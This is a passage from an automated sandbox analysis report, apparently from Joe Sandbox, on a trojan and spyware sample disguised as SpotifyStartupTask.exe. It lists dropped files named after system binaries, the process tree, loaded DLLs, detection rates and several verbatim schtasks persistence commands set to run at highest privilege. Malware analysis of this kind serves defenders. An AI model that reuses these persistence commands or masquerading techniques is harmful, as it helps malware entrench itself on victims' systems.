                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4D0D4824_2_00007FF88B4D0D48
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B4D0E4324_2_00007FF88B4D0E43
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 25_2_00007FF88B4F0D4825_2_00007FF88B4F0D48
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 25_2_00007FF88B4F0E4325_2_00007FF88B4F0E43
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B50099026_2_00007FF88B500990
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B500BB526_2_00007FF88B500BB5
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4E106226_2_00007FF88B4E1062
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4D0D4826_2_00007FF88B4D0D48
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 26_2_00007FF88B4D0E4326_2_00007FF88B4D0E43
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 27_2_00007FF88B4C0D4827_2_00007FF88B4C0D48
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeCode function: 27_2_00007FF88B4C0E4327_2_00007FF88B4C0E43
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4F106228_2_00007FF88B4F1062
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E0D4828_2_00007FF88B4E0D48
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B4E0E4328_2_00007FF88B4E0E43
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B51099028_2_00007FF88B510990
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 28_2_00007FF88B510BB528_2_00007FF88B510BB5
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E0D4829_2_00007FF88B4E0D48
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4E0E4329_2_00007FF88B4E0E43
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B4F106229_2_00007FF88B4F1062
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B51099029_2_00007FF88B510990
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B510BB529_2_00007FF88B510BB5
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88B8FD24E29_2_00007FF88B8FD24E
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA190E529_2_00007FF88BA190E5
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA1F85929_2_00007FF88BA1F859
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA19F4429_2_00007FF88BA19F44
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA1F6AF29_2_00007FF88BA1F6AF
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA18E0029_2_00007FF88BA18E00
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeCode function: 29_2_00007FF88BA1F53B29_2_00007FF88BA1F53B
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 30_2_00007FF88B4D0D4830_2_00007FF88B4D0D48
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 30_2_00007FF88B4D0E4330_2_00007FF88B4D0E43
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 30_2_00007FF88B50099030_2_00007FF88B500990
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 30_2_00007FF88B500BB530_2_00007FF88B500BB5
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 31_2_00007FF88B4E106231_2_00007FF88B4E1062
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 31_2_00007FF88B4D0D4831_2_00007FF88B4D0D48
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeCode function: 31_2_00007FF88B4D0E4331_2_00007FF88B4D0E43
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 32_2_00007FF88B4E0D4832_2_00007FF88B4E0D48
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 32_2_00007FF88B4E0E4332_2_00007FF88B4E0E43
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 32_2_00007FF88B4F106232_2_00007FF88B4F1062
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 32_2_00007FF88B51099032_2_00007FF88B510990
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 32_2_00007FF88B510BB532_2_00007FF88B510BB5
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 33_2_00007FF88B50099033_2_00007FF88B500990
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 33_2_00007FF88B500BB533_2_00007FF88B500BB5
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 33_2_00007FF88B4E106233_2_00007FF88B4E1062
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 33_2_00007FF88B4D0D4833_2_00007FF88B4D0D48
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeCode function: 33_2_00007FF88B4D0E4333_2_00007FF88B4D0E43
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 34_2_00007FF88B50099034_2_00007FF88B500990
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 34_2_00007FF88B500BB534_2_00007FF88B500BB5
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 34_2_00007FF88B4D0D4834_2_00007FF88B4D0D48
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 34_2_00007FF88B4D0E4334_2_00007FF88B4D0E43
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 34_2_00007FF88B4E106234_2_00007FF88B4E1062
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 35_2_00007FF88B51099035_2_00007FF88B510990
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 35_2_00007FF88B510BB535_2_00007FF88B510BB5
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 35_2_00007FF88B4F106235_2_00007FF88B4F1062
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 35_2_00007FF88B4E0D4835_2_00007FF88B4E0D48
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeCode function: 35_2_00007FF88B4E0E4335_2_00007FF88B4E0E43
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe 2604FC4DE987995CBC77B46BF86D49466FB65DD7DBEE6B1B89FE343EF9B97617
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\7-Zip\Lang\winlogon.exe 2604FC4DE987995CBC77B46BF86D49466FB65DD7DBEE6B1B89FE343EF9B97617
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\DUQujoOa.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1272295802.000000001B585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs SpotifyStartupTask.exe
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs SpotifyStartupTask.exe
                              Source: SpotifyStartupTask.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: SpotifyStartupTask.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dwm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: PQ4HCWgZazguIsFyU1PhJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dxLy2s6A.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: winlogon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csCryptographic APIs: 'CreateDecryptor'
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csCryptographic APIs: 'CreateDecryptor'
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csCryptographic APIs: 'CreateDecryptor'
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@41/60@5/3
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Program Files\7-Zip\Lang\winlogon.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\XUwHpYfn.logJump to behavior
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lyFL9C96UdpRArWkuUmQ
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\AppData\Local\Temp\qfasrhtcJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: SpotifyStartupTask.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SpotifyStartupTask.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 8TW3TyHpGz.29.dr, 0Pf1RKp80Q.29.dr, MnGqFFSc0M.29.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: SpotifyStartupTask.exeVirustotal: Detection: 69%
                              Source: SpotifyStartupTask.exeReversingLabs: Detection: 66%
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile read: C:\Users\user\Desktop\SpotifyStartupTask.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\SpotifyStartupTask.exe "C:\Users\user\Desktop\SpotifyStartupTask.exe"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZ" /sc ONLOGON /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6A" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\DiagTrack\dwm.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Windows\DiagTrack\dwm.exe C:\Windows\DiagTrack\dwm.exe
                              Source: unknownProcess created: C:\Windows\DiagTrack\dwm.exe C:\Windows\DiagTrack\dwm.exe
                              Source: unknownProcess created: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe "C:\Program Files (x86)\google\Update\dxLy2s6A.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe "C:\Program Files (x86)\google\Update\dxLy2s6A.exe"
                              Source: unknownProcess created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: unknownProcess created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: unknownProcess created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: unknownProcess created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\SpotifyStartupTask.exe C:\Users\user\Desktop\SpotifyStartupTask.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\SpotifyStartupTask.exe C:\Users\user\Desktop\SpotifyStartupTask.exe
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\winlogon.exe "C:\Program Files\7-Zip\Lang\winlogon.exe"
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\winlogon.exe "C:\Program Files\7-Zip\Lang\winlogon.exe"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: onecorecommonproxystub.dllJump to behavior
